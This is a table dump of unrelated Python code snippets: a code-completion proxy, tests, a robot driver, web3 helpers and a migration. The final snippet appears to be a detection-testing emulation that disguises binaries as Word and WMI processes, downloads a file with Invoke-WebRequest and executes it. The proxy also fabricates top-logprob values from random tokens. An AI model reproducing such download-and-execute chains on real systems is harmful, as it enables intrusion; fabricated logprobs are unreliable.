code stringlengths 281 23.7M |
|---|
class CodeGenProxy():
def __init__(self, host: str='triton', port: int=8001, verbose: bool=False):
self.tokenizer = Tokenizer.from_file('/python-docker/cgtok/tokenizer.json')
self.client = client_util.InferenceServerClient(url=f'{host}:{port}', verbose=verbose)
self.PAD_CHAR = 50256
self.MAX_MODEL_LEN = 2048
class TokensExceedsMaximum(Exception):
pass
def prepare_tensor(name: str, tensor_input):
t = client_util.InferInput(name, tensor_input.shape, np_to_triton_dtype(tensor_input.dtype))
t.set_data_from_numpy(tensor_input)
return t
def trim_with_stopwords(output: str, stopwords: list) -> str:
for w in sorted(stopwords, key=len, reverse=True):
if output.endswith(w):
output = output[:(- len(w))]
break
return output
def to_word_list_format(word_dict, tokenizer):
flat_ids = []
offsets = []
for word_dict_item in word_dict:
item_flat_ids = []
item_offsets = []
for word in word_dict_item:
ids = tokenizer.encode(word).ids
if (len(ids) == 0):
continue
item_flat_ids += ids
item_offsets.append(len(ids))
if (word == '\n\n'):
item_flat_ids += [198, 198]
item_offsets.append(2)
flat_ids.append(np.array(item_flat_ids))
offsets.append(np.cumsum(np.array(item_offsets)))
pad_to = max(1, max((len(ids) for ids in flat_ids)))
for (i, (ids, offs)) in enumerate(zip(flat_ids, offsets)):
flat_ids[i] = np.pad(ids, (0, (pad_to - len(ids))), constant_values=0)
offsets[i] = np.pad(offs, (0, (pad_to - len(offs))), constant_values=(- 1))
return np.array([flat_ids, offsets], dtype='int32').transpose((1, 0, 2))
def generate(self, data):
prompt = data['prompt']
n = data.get('n', 1)
model_name = data['model']
np_type = (np.int32 if model_name.startswith('py-') else np.uint32)
input_start_ids = np.expand_dims(self.tokenizer.encode(prompt).ids, 0)
input_start_ids = np.repeat(input_start_ids, n, axis=0).astype(np_type)
prompt_len = input_start_ids.shape[1]
input_len = (prompt_len * np.ones([input_start_ids.shape[0], 1]).astype(np_type))
max_tokens = data.get('max_tokens', 16)
prompt_tokens: int = input_len[0][0]
requested_tokens = (max_tokens + prompt_tokens)
if (requested_tokens > self.MAX_MODEL_LEN):
print(1)
raise self.TokensExceedsMaximum(f"This model's maximum context length is {self.MAX_MODEL_LEN}, however you requested {requested_tokens} tokens ({prompt_tokens} in your prompt; {max_tokens} for the completion). Please reduce your prompt; or completion length.")
output_len = (np.ones_like(input_len).astype(np_type) * max_tokens)
num_logprobs = data.get('logprobs', (- 1))
if (num_logprobs is None):
num_logprobs = (- 1)
want_logprobs = (num_logprobs > 0)
temperature = data.get('temperature', 0.2)
if (temperature == 0.0):
temperature = 1.0
top_k = 1
else:
top_k = data.get('top_k', 0)
top_p = data.get('top_p', 1.0)
frequency_penalty = data.get('frequency_penalty', 1.0)
runtime_top_k = (top_k * np.ones([input_start_ids.shape[0], 1]).astype(np_type))
runtime_top_p = (top_p * np.ones([input_start_ids.shape[0], 1]).astype(np.float32))
beam_search_diversity_rate = (0.0 * np.ones([input_start_ids.shape[0], 1]).astype(np.float32))
random_seed = np.random.randint(0, ((2 ** 31) - 1), (input_start_ids.shape[0], 1), dtype=np.int32)
temperature = (temperature * np.ones([input_start_ids.shape[0], 1]).astype(np.float32))
len_penalty = (1.0 * np.ones([input_start_ids.shape[0], 1]).astype(np.float32))
repetition_penalty = (frequency_penalty * np.ones([input_start_ids.shape[0], 1]).astype(np.float32))
is_return_log_probs = (want_logprobs * np.ones([input_start_ids.shape[0], 1]).astype(np.bool_))
beam_width = (1 * np.ones([input_start_ids.shape[0], 1])).astype(np_type)
start_ids = (self.PAD_CHAR * np.ones([input_start_ids.shape[0], 1]).astype(np_type))
end_ids = (self.PAD_CHAR * np.ones([input_start_ids.shape[0], 1]).astype(np_type))
stop_words = data.get('stop', [])
if (stop_words is None):
stop_words = []
if stop_words:
stop_word_list = np.repeat(self.to_word_list_format([stop_words], self.tokenizer), input_start_ids.shape[0], axis=0)
else:
stop_word_list = np.concatenate([np.zeros([input_start_ids.shape[0], 1, 1]).astype(np.int32), ((- 1) * np.ones([input_start_ids.shape[0], 1, 1])).astype(np.int32)], axis=1)
bad_words_list = np.concatenate([np.zeros([input_start_ids.shape[0], 1, 1]).astype(np.int32), ((- 1) * np.ones([input_start_ids.shape[0], 1, 1])).astype(np.int32)], axis=1)
inputs = [self.prepare_tensor('input_ids', input_start_ids), self.prepare_tensor('input_lengths', input_len), self.prepare_tensor('request_output_len', output_len), self.prepare_tensor('runtime_top_k', runtime_top_k), self.prepare_tensor('runtime_top_p', runtime_top_p), self.prepare_tensor('beam_search_diversity_rate', beam_search_diversity_rate), self.prepare_tensor('random_seed', random_seed), self.prepare_tensor('temperature', temperature), self.prepare_tensor('len_penalty', len_penalty), self.prepare_tensor('repetition_penalty', repetition_penalty), self.prepare_tensor('is_return_log_probs', is_return_log_probs), self.prepare_tensor('beam_width', beam_width), self.prepare_tensor('start_id', start_ids), self.prepare_tensor('end_id', end_ids), self.prepare_tensor('bad_words_list', bad_words_list), self.prepare_tensor('stop_words_list', stop_word_list)]
result = self.client.infer(model_name, inputs)
output_data = result.as_numpy('output_ids')
if (output_data is None):
raise RuntimeError('No output data')
output_data = output_data.squeeze(1)
if want_logprobs:
lp_data = result.as_numpy('output_log_probs').squeeze(1)
else:
lp_data = ([None] * output_data.shape[0])
sequence_lengths = result.as_numpy('sequence_length').squeeze(1)
gen_len = (sequence_lengths - input_len.squeeze(1))
decoded = self.tokenizer.decode_batch([out[prompt_len:(prompt_len + g)] for (g, out) in zip(gen_len, output_data)])
trimmed = [self.trim_with_stopwords(d, stop_words) for d in decoded]
choices = []
for (i, (text, tokens, lps, g)) in enumerate(zip(trimmed, output_data, lp_data, gen_len)):
reason = ('length' if (max_tokens == g) else 'stop')
if (lps is not None):
tokens_str = [self.tokenizer.decode([t]) for t in tokens[prompt_len:(prompt_len + g)]]
offsets = ([len(prompt)] + (np.cumsum([len(t) for t in tokens_str]) + len(prompt)).tolist()[:(- 1)])
top_logprobs = []
for (ii, t) in enumerate(tokens_str):
fakedict = {}
top_token_lp = float(lps[ii])
fakedict[t] = top_token_lp
while (len(fakedict) < num_logprobs):
random_token = random.randint(0, (self.tokenizer.get_vocab_size() - 1))
random_token_str = self.tokenizer.decode([random_token])
if (random_token_str in fakedict):
continue
random_token_lp = (top_token_lp - random.random())
fakedict[random_token_str] = random_token_lp
top_logprobs.append(fakedict)
lpdict = {'token_logprobs': lps.tolist(), 'top_logprobs': top_logprobs, 'tokens': tokens_str, 'text_offset': offsets}
else:
lpdict = None
choice = {'text': text, 'index': i, 'finish_reason': reason, 'logprobs': lpdict}
choices.append(choice)
completion = {'id': None, 'model': 'codegen', 'object': 'text_completion', 'created': int(time.time()), 'choices': None, 'usage': {'completion_tokens': int(gen_len.sum()), 'prompt_tokens': int(prompt_len), 'total_tokens': int((gen_len.sum() + prompt_len))}}
return (completion, choices)
def random_completion_id():
return ('cmpl-' + ''.join((random.choice((string.ascii_letters + string.digits)) for _ in range(29))))
def streamed_response(self, completion, choices):
for c in choices:
completion['id'] = self.random_completion_id()
completion['choices'] = [c]
(yield f'{json.dumps(completion)}')
(yield '[DONE]')
def non_streamed_response(self, completion, choices) -> str:
completion['id'] = self.random_completion_id()
completion['choices'] = choices
return json.dumps(completion)
def __call__(self, data: dict):
st = time.time()
try:
(completion, choices) = self.generate(data)
except InferenceServerException as exc:
print(exc)
if (exc.status() == 'StatusCode.UNAVAILABLE'):
print(f"WARNING: Model '{data['model']}' is not available. Please ensure that `model` is set to either 'fastertransformer' or 'py-model' depending on your installation")
completion = {}
choices = []
ed = time.time()
print(f'Returned completion in {((ed - st) * 1000)} ms')
if data.get('stream', False):
return self.streamed_response(completion, choices)
else:
return self.non_streamed_response(completion, choices) |
def test_correct_number_of_rows_are_generated():
df = gen.generate(props={'region': gen.choice(data=['EMEA', 'LATAM', 'NAM', 'APAC'], weights=[0.1, 0.1, 0.3, 0.5]), 'country': gen.country_codes(region_field='region'), 'contact_name': gen.person(country_field='country')}, count=50, randomstate=np.random.RandomState()).to_dataframe() |
def verbosity_to_loglevel(verbosity, *, maxlevel=logging.CRITICAL):
assert (maxlevel is not None)
if isinstance(maxlevel, str):
_maxlevel = get_valid_loglevel(maxlevel)
if (_maxlevel is None):
raise ValueError(f'unsupported maxlevel {maxlevel!r}')
maxlevel = maxlevel
elif logging.getLevelName(maxlevel).startswith('Level '):
if (maxlevel % 10):
maxlevel -= (maxlevel % 10)
return max(1, min(maxlevel, (maxlevel - (verbosity * 10)))) |
_type_check
def test_trap_protocol_receiving_log(caplog) -> None:
proto = tpt.SNMPTrapReceiverProtocol((lambda _: None))
with caplog.at_level(logging.DEBUG):
proto.datagram_received(b'trap-packet', ('192.0.2.1', 42))
assert ('Received packet' in caplog.text)
assert ('74 72 61' in caplog.text), 'hexdump of trap-packet not found' |
class ForCursorA(StmtCursorA):
def _cursor_call(self, loop_pattern, all_args):
try:
(name, count) = NameCountA()(loop_pattern, all_args)
count = (f' #{count}' if (count is not None) else '')
loop_pattern = f'for {name} in _: _{count}'
except:
pass
cursor = super()._cursor_call(loop_pattern, all_args)
if (not isinstance(cursor, PC.ForCursor)):
self.err(f'expected a ForCursor, not {type(cursor)}')
return cursor |
_app.callback(Output('opt-result', 'children'), Input('finish-otp', 'n_clicks'), State('psa-pin', 'value'), State('psa-code', 'value'))
def finishOtp(n_clicks, code_pin, sms_code):
ctx = callback_context
if ctx.triggered:
try:
otp_session = new_otp_session(sms_code, code_pin, app.myp.remote_client.otp)
app.myp.remote_client.otp = otp_session
app.myp.save_config()
app.start_remote_control()
return dbc.Alert(['OTP config finish !!! ', html.A('Go to home', href=request.url_root)], color='success')
except Exception as e:
res = str(e)
logger.exception('finishOtp:')
return dbc.Alert(res, color='danger')
raise PreventUpdate() |
def setup_texas_wind_map(ax, region=((- 107), (- 93), 25.5, 37), coastlines=True, **kwargs):
if kwargs:
warnings.warn(('All kwargs are being ignored. They are accepted to ' + 'guarantee backward compatibility.'), stacklevel=2)
_setup_map(ax, xticks=np.arange((- 106), (- 92), 3), yticks=np.arange(27, 38, 3), coastlines=coastlines, region=region, crs=ccrs.PlateCarree()) |
def extractTalesofDreamwidthOrg(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
class OptionSeriesAreaSonificationTracksMapping(Options):
def frequency(self) -> 'OptionSeriesAreaSonificationTracksMappingFrequency':
return self._config_sub_data('frequency', OptionSeriesAreaSonificationTracksMappingFrequency)
def gapBetweenNotes(self) -> 'OptionSeriesAreaSonificationTracksMappingGapbetweennotes':
return self._config_sub_data('gapBetweenNotes', OptionSeriesAreaSonificationTracksMappingGapbetweennotes)
def highpass(self) -> 'OptionSeriesAreaSonificationTracksMappingHighpass':
return self._config_sub_data('highpass', OptionSeriesAreaSonificationTracksMappingHighpass)
def lowpass(self) -> 'OptionSeriesAreaSonificationTracksMappingLowpass':
return self._config_sub_data('lowpass', OptionSeriesAreaSonificationTracksMappingLowpass)
def noteDuration(self) -> 'OptionSeriesAreaSonificationTracksMappingNoteduration':
return self._config_sub_data('noteDuration', OptionSeriesAreaSonificationTracksMappingNoteduration)
def pan(self) -> 'OptionSeriesAreaSonificationTracksMappingPan':
return self._config_sub_data('pan', OptionSeriesAreaSonificationTracksMappingPan)
def pitch(self) -> 'OptionSeriesAreaSonificationTracksMappingPitch':
return self._config_sub_data('pitch', OptionSeriesAreaSonificationTracksMappingPitch)
def playDelay(self) -> 'OptionSeriesAreaSonificationTracksMappingPlaydelay':
return self._config_sub_data('playDelay', OptionSeriesAreaSonificationTracksMappingPlaydelay)
def rate(self) -> 'OptionSeriesAreaSonificationTracksMappingRate':
return self._config_sub_data('rate', OptionSeriesAreaSonificationTracksMappingRate)
def text(self):
return self._config_get(None)
def text(self, text: str):
self._config(text, js_type=False)
def time(self) -> 'OptionSeriesAreaSonificationTracksMappingTime':
return self._config_sub_data('time', OptionSeriesAreaSonificationTracksMappingTime)
def tremolo(self) -> 'OptionSeriesAreaSonificationTracksMappingTremolo':
return self._config_sub_data('tremolo', OptionSeriesAreaSonificationTracksMappingTremolo)
def volume(self) -> 'OptionSeriesAreaSonificationTracksMappingVolume':
return self._config_sub_data('volume', OptionSeriesAreaSonificationTracksMappingVolume) |
class TestSentimentAnalysisDataClass():
ITEMS = [SegmentSentimentAnalysisDataClass(segment='Valid Segement', sentiment='Positive', sentiment_rate=0.5)]
.parametrize(('kwargs', 'expected'), [_assign_markers_parametrize(items=ITEMS, general_sentiment=SentimentEnum.POSITIVE.value, general_sentiment_rate=0, expected={'sentiment': 'Positive', 'sentiment_rate': 0.0}), _assign_markers_parametrize(items=ITEMS, general_sentiment=SentimentEnum.NEGATIVE.value, general_sentiment_rate=1.0, expected={'sentiment': 'Negative', 'sentiment_rate': 1.0}), _assign_markers_parametrize(items=ITEMS, general_sentiment=SentimentEnum.NEUTRAL.value, general_sentiment_rate=0.578, expected={'sentiment': 'Neutral', 'sentiment_rate': 0.58}), _assign_markers_parametrize(items=ITEMS, general_sentiment='neutral', general_sentiment_rate=None, expected={'sentiment': 'Neutral', 'sentiment_rate': None})], ids=['test_with_sentiment_positive_enum_rate_0', 'test_with_sentiment_negative_enum_rate_1.00', 'test_with_sentiment_neutral_enum_rate_0.578', 'test_with_sentiment_neutral_rate_none'])
def test_valid_input(self, kwargs, expected):
klass = SentimentAnalysisDataClass(**kwargs)
assert (klass.general_sentiment == expected['sentiment']), "The value of `sentiment` must be in ['Positive', 'Negative', 'Neutral']"
assert (klass.general_sentiment_rate == expected['sentiment_rate']), 'The value of `sentiment_rate` must be rounded to the hundredth' |
class MyAgv(DataProcessor):
def __init__(self, port='/dev/ttyAMA0', baudrate='115200', timeout=0.1, debug=False):
self.debug = debug
setup_logging(self.debug)
self.log = logging.getLogger(__name__)
self._serial_port = serial.Serial()
self._serial_port.port = port
self._serial_port.baudrate = baudrate
self._serial_port.timeout = timeout
self._serial_port.rts = False
self._serial_port.open()
def _write(self, command):
self._serial_port.reset_input_buffer()
self.log.debug('_write: {}'.format([hex(i) for i in command]))
self._serial_port.write(command)
self._serial_port.flush()
def _read(self, command):
datas = b''
k = 0
pre = 0
end = 5
t = time.time()
if (command[(k - 1)] == 29):
end = 29
while ((time.time() - t) < 0.2):
data = self._serial_port.read()
k += 1
if (len(datas) == 4):
if ((datas[(- 2)] == 1) and (datas[(- 1)] == 5)):
end = 7
datas += data
elif (len(datas) == end):
datas += data
break
elif (len(datas) > 4):
datas += data
elif (len(datas) >= 2):
data_len = struct.unpack('b', data)[0]
if ((command[(- 1)] == 29) or (data_len == command[(k - 1)])):
datas += data
else:
datas = b''
k = 0
pre = 0
elif (data == b'\xfe'):
if (datas == b''):
datas += data
if (k != 1):
k = 1
pre = k
elif ((k - 1) == pre):
datas += data
else:
datas = b'\xfe'
k = 1
pre = 0
else:
datas = b''
self.log.debug('_read: {}'.format([hex(data) for data in datas]))
return datas
def _mesg(self, genre, *args, **kwargs):
has_reply = kwargs.get('has_reply', None)
real_command = self._process_data_command(genre, self.__class__.__name__, args)
command = [ProtocolCode.HEADER.value, ProtocolCode.HEADER.value]
if isinstance(genre, list):
for data in genre:
command.append(data)
else:
command.append(genre)
command.append(real_command)
command = self._flatten(command)
if (genre == ProtocolCode.SET_LED.value):
command.append((sum(command[2:]) & 255))
elif (genre == ProtocolCode.GET_FIRMWARE_VERSION.value):
command.append(4)
elif (genre == ProtocolCode.GET_MOTORS_CURRENT.value):
command.append(5)
elif (genre == ProtocolCode.GET_BATTERY_INFO.value):
command.append(6)
else:
command.append((sum(command[2:]) & 255))
self._write(command)
if has_reply:
data = self._read(command)
if data:
if (genre == ProtocolCode.GET_FIRMWARE_VERSION.value):
return self._int2coord(data[4])
elif (genre == ProtocolCode.GET_MOTORS_CURRENT.value):
return self._decode_int16(data[4:6])
elif ProtocolCode.GET_BATTERY_INFO.value:
byte_1 = bin(data[4])[2:]
res = []
while (len(byte_1) != 6):
byte_1 = ('0' + byte_1)
res.append(byte_1)
res.append(self._int2coord(data[5]))
res.append(self._int2coord(data[6]))
if (byte_1[0] == '0'):
res[(- 1)] = 0
elif (byte_1[1] == '0'):
res[1] = 0
return res
return None
def set_led(self, mode, R, G, B):
calibration_parameters(class_name=self.__class__.__name__, rgb=[R, G, B], led_mode=mode)
return self._mesg(ProtocolCode.SET_LED.value, mode, R, G, B)
def get_firmware_version(self):
return self._mesg(ProtocolCode.GET_FIRMWARE_VERSION.value, has_reply=True)
def get_motors_current(self):
return self._mesg(ProtocolCode.GET_MOTORS_CURRENT.value, has_reply=True)
def get_battery_info(self):
return self._mesg(ProtocolCode.GET_BATTERY_INFO.value, has_reply=True)
def go_ahead(self, go_speed, timeout=5):
calibration_parameters(class_name=self.__class__.__name__, data=go_speed)
t = time.time()
while ((time.time() - t) < timeout):
self._mesg((128 + go_speed), 128, 128)
time.sleep(0.1)
self.stop()
def retreat(self, back_speed, timeout=5):
calibration_parameters(class_name=self.__class__.__name__, data=back_speed)
t = time.time()
while ((time.time() - t) < timeout):
self._mesg((128 - back_speed), 128, 128)
time.sleep(0.1)
self.stop()
def pan_left(self, pan_left_speed, timeout=5):
calibration_parameters(class_name=self.__class__.__name__, data=pan_left_speed)
t = time.time()
while ((time.time() - t) < timeout):
self._mesg(128, (128 + pan_left_speed), 128)
time.sleep(0.1)
self.stop()
def pan_right(self, pan_right_speed, timeout=5):
calibration_parameters(class_name=self.__class__.__name__, pan_right_speed=pan_right_speed)
t = time.time()
while ((time.time() - t) < timeout):
self._mesg(128, (128 - pan_right_speed), 128)
time.sleep(0.1)
self.stop()
def clockwise_rotation(self, rotate_right_speed, timeout=5):
calibration_parameters(class_name=self.__class__.__name__, rotate_right_speed=rotate_right_speed)
t = time.time()
while ((time.time() - t) < timeout):
self._mesg(128, 128, (128 - rotate_right_speed))
time.sleep(0.1)
self.stop()
def counterclockwise_rotation(self, rotate_left_speed, timeout=5):
calibration_parameters(class_name=self.__class__.__name__, rotate_left_speed=rotate_left_speed)
t = time.time()
while ((time.time() - t) < timeout):
self._mesg(128, 128, (128 + rotate_left_speed))
time.sleep(0.1)
self.stop()
def stop(self):
self._mesg(128, 128, 128)
def get_mcu_info(self):
datas = self._read([254, 254, 29])
res = []
index = 2
while (index < (len(datas) - 2)):
if (index < 5):
res.append(datas[index])
index += 1
elif ((index < 17) or (index >= 20)):
res.append(self._decode_int16(datas[index:(index + 2)]))
index += 2
elif (index == 17):
byte_1 = bin(datas[index])[2:]
while (len(byte_1) != 6):
byte_1 = ('0' + byte_1)
res.append(byte_1)
index += 1
elif (index < 20):
res.append(self._int2coord(datas[index]))
index += 1
return res
def restore(self):
self._mesg(ProtocolCode.RESTORE.value, 1) |
class Contract(BaseContract):
w3: 'Web3'
functions: ContractFunctions = None
caller: 'ContractCaller' = None
events: ContractEvents = None
def __init__(self, address: Optional[ChecksumAddress]=None) -> None:
_w3 = self.w3
if (_w3 is None):
raise AttributeError('The `Contract` class has not been initialized. Please use the `web3.contract` interface to create your contract class.')
if address:
self.address = normalize_address(cast('ENS', _w3.ens), address)
if (not self.address):
raise TypeError('The address argument is required to instantiate a contract.')
self.functions = ContractFunctions(self.abi, _w3, self.address, decode_tuples=self.decode_tuples)
self.caller = ContractCaller(self.abi, _w3, self.address, decode_tuples=self.decode_tuples)
self.events = ContractEvents(self.abi, _w3, self.address)
self.fallback = Contract.get_fallback_function(self.abi, _w3, ContractFunction, self.address)
self.receive = Contract.get_receive_function(self.abi, _w3, ContractFunction, self.address)
def factory(cls, w3: 'Web3', class_name: Optional[str]=None, **kwargs: Any) -> Type[Self]:
kwargs['w3'] = w3
normalizers = {'abi': normalize_abi, 'address': partial(normalize_address, w3.ens), 'bytecode': normalize_bytecode, 'bytecode_runtime': normalize_bytecode}
contract = cast(Type[Self], PropertyCheckingFactory((class_name or cls.__name__), (cls,), kwargs, normalizers=normalizers))
contract.functions = ContractFunctions(contract.abi, contract.w3, decode_tuples=contract.decode_tuples)
contract.caller = ContractCaller(contract.abi, contract.w3, contract.address, decode_tuples=contract.decode_tuples)
contract.events = ContractEvents(contract.abi, contract.w3)
contract.fallback = Contract.get_fallback_function(contract.abi, contract.w3, ContractFunction)
contract.receive = Contract.get_receive_function(contract.abi, contract.w3, ContractFunction)
return contract
def constructor(cls, *args: Any, **kwargs: Any) -> 'ContractConstructor':
if (cls.bytecode is None):
raise ValueError("Cannot call constructor on a contract that does not have 'bytecode' associated with it")
return ContractConstructor(cls.w3, cls.abi, cls.bytecode, *args, **kwargs)
def find_functions_by_identifier(cls, contract_abi: ABI, w3: 'Web3', address: ChecksumAddress, callable_check: Callable[(..., Any)]) -> List['ContractFunction']:
return cast(List['ContractFunction'], find_functions_by_identifier(contract_abi, w3, address, callable_check, ContractFunction))
def get_function_by_identifier(cls, fns: Sequence['ContractFunction'], identifier: str) -> 'ContractFunction':
return get_function_by_identifier(fns, identifier) |
def change():
global mc
mode = 1
_mode = input('Please input mode, 1 = high precision, 2 = stabilize (default: 1 ):')
try:
mode = int(_mode)
except Exception:
pass
print(mode)
print('')
for _mycbot in mc:
print(_mycbot)
for i in range(1, 7):
if (mode == 1):
data = [10, 0, 1, 0, 3, 3]
elif (mode == 2):
if (i < 4):
data = [5, 15, 0, 0, 3, 3]
else:
data = [8, 24, 0, 0, 3, 3]
else:
print('Please set the parameter mode !!!')
goto(change())
for j in range(len(data_id)):
_mycbot.set_servo_data(i, data_id[j], data[j])
time.sleep(0.2)
_data = _mycbot.get_servo_data(i, data_id[j])
time.sleep(0.2)
if (_data == data[j]):
print((((((('Servo motor :' + str(i)) + ' data_id : ') + str(data_id[j])) + ' data: ') + str(_data)) + ' modify successfully '))
else:
print((((((('Servo motor :' + str(i)) + ' data_id : ') + str(data_id[j])) + ' data: ') + str(_data)) + ' modify error ')) |
def construct_sign_and_send_raw_middleware(private_key_or_account: Union[(_PrivateKey, Collection[_PrivateKey])]) -> Middleware:
accounts = gen_normalized_accounts(private_key_or_account)
def sign_and_send_raw_middleware(make_request: Callable[([RPCEndpoint, Any], Any)], w3: 'Web3') -> Callable[([RPCEndpoint, Any], RPCResponse)]:
format_and_fill_tx = compose(format_transaction, fill_transaction_defaults(w3), fill_nonce(w3))
def middleware(method: RPCEndpoint, params: Any) -> RPCResponse:
if (method != 'eth_sendTransaction'):
return make_request(method, params)
else:
transaction = format_and_fill_tx(params[0])
if ('from' not in transaction):
return make_request(method, params)
elif (transaction.get('from') not in accounts):
return make_request(method, params)
account = accounts[transaction['from']]
raw_tx = account.sign_transaction(transaction).rawTransaction
return make_request(RPCEndpoint('eth_sendRawTransaction'), [raw_tx.hex()])
return middleware
return sign_and_send_raw_middleware |
def reject_recursive_repeats(to_wrap: Callable[(..., Any)]) -> Callable[(..., Any)]:
to_wrap.__already_called = {}
(to_wrap)
def wrapped(*args: Any) -> Any:
arg_instances = tuple(map(id, args))
thread_id = threading.get_ident()
thread_local_args = ((thread_id,) + arg_instances)
if (thread_local_args in to_wrap.__already_called):
raise ValueError(f'Recursively called {to_wrap} with {args!r}')
to_wrap.__already_called[thread_local_args] = True
try:
wrapped_val = to_wrap(*args)
finally:
del to_wrap.__already_called[thread_local_args]
return wrapped_val
return wrapped |
def downgrade():
op.drop_constraint('events_event_topic_id_fkey', 'events', type_='foreignkey')
op.execute('ALTER TABLE events ALTER COLUMN event_topic_id TYPE varchar USING event_topic_id::varchar')
op.execute('UPDATE events SET event_topic_id = (SELECT name FROM event_topics WHERE event_topics.id=cast(events.event_topic_id as int))')
op.execute('ALTER TABLE events_version ALTER COLUMN event_topic_id TYPE varchar USING event_topic_id::varchar')
op.execute('UPDATE events_version SET event_topic_id = (SELECT name FROM event_topics WHERE event_topics.id=cast(events_version.event_topic_id as int))')
op.alter_column('events', 'event_topic_id', new_column_name='topic')
op.alter_column('events_version', 'event_topic_id', new_column_name='topics')
op.drop_table('event_topics') |
class GetForObjectModelDbTest(TestModelMixin, TestBase):
databases = {'default', 'postgres'}
def testGetForObjectModelDb(self):
with reversion.create_revision():
obj = TestModel.objects.db_manager('postgres').create()
self.assertEqual(Version.objects.get_for_object(obj).count(), 0)
self.assertEqual(Version.objects.get_for_object(obj, model_db='postgres').count(), 1) |
class ResizeError(FlowChecksumBase):
def runTest(self):
self.controller.message_send(ofp.message.bsn_table_set_buckets_size(table_id=TABLE_ID, buckets_size=0))
do_barrier(self.controller)
(error, _) = self.controller.poll(ofp.OFPT_ERROR)
self.assertIsInstance(error, ofp.message.error_msg)
self.controller.message_send(ofp.message.bsn_table_set_buckets_size(table_id=TABLE_ID, buckets_size=3))
do_barrier(self.controller)
(error, _) = self.controller.poll(ofp.OFPT_ERROR)
self.assertIsInstance(error, ofp.message.error_msg)
self.controller.message_send(ofp.message.bsn_table_set_buckets_size(table_id=TABLE_ID, buckets_size=100))
do_barrier(self.controller)
(error, _) = self.controller.poll(ofp.OFPT_ERROR)
self.assertIsInstance(error, ofp.message.error_msg)
self.controller.message_send(ofp.message.bsn_table_set_buckets_size(table_id=TABLE_ID, buckets_size=((2 ** 32) - 1)))
do_barrier(self.controller)
(error, _) = self.controller.poll(ofp.OFPT_ERROR)
self.assertIsInstance(error, ofp.message.error_msg)
self.controller.message_send(ofp.message.bsn_table_set_buckets_size(table_id=TABLE_ID, buckets_size=(2 ** 31)))
do_barrier(self.controller)
(error, _) = self.controller.poll(ofp.OFPT_ERROR)
self.assertIsInstance(error, ofp.message.error_msg) |
.parametrize('test_ds,expected_interpolable_spaces', [('test_v5_aktiv.designspace', [({}, {'AktivGroteskVF_Italics_Wght', 'AktivGroteskVF_Italics_WghtWdth', 'AktivGroteskVF_Wght', 'AktivGroteskVF_WghtWdth', 'AktivGroteskVF_WghtWdthItal'})]), ('test_v5_sourceserif.designspace', [({'italic': 0}, {'SourceSerif4Variable-Roman'}), ({'italic': 1}, {'SourceSerif4Variable-Italic'})]), ('test_v5_MutatorSans_and_Serif.designspace', [({'serif': 0}, {'MutatorSansVariable_Weight_Width', 'MutatorSansVariable_Weight', 'MutatorSansVariable_Width'}), ({'serif': 1}, {'MutatorSerifVariable_Width'})])])
def test_split(datadir, tmpdir, test_ds, expected_interpolable_spaces):
data_in = (datadir / test_ds)
temp_in = (Path(tmpdir) / test_ds)
shutil.copy(data_in, temp_in)
doc = DesignSpaceDocument.fromfile(temp_in)
for (i, (location, sub_doc)) in enumerate(splitInterpolable(doc)):
(expected_location, expected_vf_names) = expected_interpolable_spaces[i]
assert (location == expected_location)
vfs = list(splitVariableFonts(sub_doc))
assert (expected_vf_names == set((vf[0] for vf in vfs)))
loc_str = '_'.join((f'{name}_{value}' for (name, value) in sorted(location.items())))
data_out = ((datadir / 'split_output') / f'{temp_in.stem}_{loc_str}.designspace')
temp_out = ((Path(tmpdir) / 'out') / f'{temp_in.stem}_{loc_str}.designspace')
temp_out.parent.mkdir(exist_ok=True)
sub_doc.write(temp_out)
if UPDATE_REFERENCE_OUT_FILES_INSTEAD_OF_TESTING:
data_out.write_text(temp_out.read_text(encoding='utf-8'), encoding='utf-8')
else:
assert (data_out.read_text(encoding='utf-8') == temp_out.read_text(encoding='utf-8'))
for (vf_name, vf_doc) in vfs:
data_out = ((datadir / 'split_output') / vf_name).with_suffix('.designspace')
temp_out = ((Path(tmpdir) / 'out') / vf_name).with_suffix('.designspace')
temp_out.parent.mkdir(exist_ok=True)
vf_doc.write(temp_out)
if UPDATE_REFERENCE_OUT_FILES_INSTEAD_OF_TESTING:
data_out.write_text(temp_out.read_text(encoding='utf-8'), encoding='utf-8')
else:
assert (data_out.read_text(encoding='utf-8') == temp_out.read_text(encoding='utf-8')) |
def run_in_environment_with_teleport(environment: EnvironmentDefinition, code: str, teleport_info: TeleportInfo, locations: DataLocation, config: RuntimeConfig, adapter_type: str) -> AdapterResponse:
compressed_local_packages = None
is_remote = (type(environment.host) is FalServerlessHost)
deps = get_default_pip_dependencies(is_remote=is_remote, adapter_type=adapter_type, is_teleport=True)
fal_scripts_path = get_fal_scripts_path(config)
if (is_remote and fal_scripts_path.exists()):
with NamedTemporaryFile() as temp_file:
with zipfile.ZipFile(temp_file.name, 'w', zipfile.ZIP_DEFLATED) as zip_file:
for entry in fal_scripts_path.rglob('*'):
zip_file.write(entry, entry.relative_to(fal_scripts_path))
compressed_local_packages = temp_file.read()
execute_model = partial(run_with_teleport, code=code, teleport_info=teleport_info, locations=locations, config=config, local_packages=compressed_local_packages)
if (environment.kind == 'virtualenv'):
requirements = environment.config.get('requirements', [])
requirements += deps
isolated_function = isolated(kind='virtualenv', host=environment.host, requirements=requirements)(execute_model)
elif (environment.kind == 'conda'):
dependencies = environment.config.pop('packages', [])
dependencies.append({'pip': deps})
env_dict = {'name': 'dbt_fal_env', 'channels': ['conda-forge', 'defaults'], 'dependencies': dependencies}
isolated_function = isolated(kind='conda', host=environment.host, env_dict=env_dict)(execute_model)
else:
raise Exception(f'Environment type not supported: {environment.kind}')
if is_remote:
isolated_function = isolated_function.on(machine_type=environment.machine_type)
result = isolated_function()
return result |
_os(*metadata.platforms)
def main():
(server, ip, port) = common.serve_web()
url = f'
winword = 'C:\\Users\\Public\\winword.exe'
wmiprvse = 'C:\\Users\\Public\\wmiprvse.exe'
dropped = 'C:\\Users\\Public\\posh.exe'
common.copy_file(EXE_FILE, winword)
common.copy_file(EXE_FILE, wmiprvse)
common.copy_file(EXE_FILE, dropped)
cmd = f'Invoke-WebRequest -Uri {url} -OutFile {dropped}'
common.execute([winword, '/c', cmd], timeout=10)
common.execute([wmiprvse, '/c', dropped], timeout=10, kill=True)
common.remove_file(winword)
common.remove_file(dropped) |
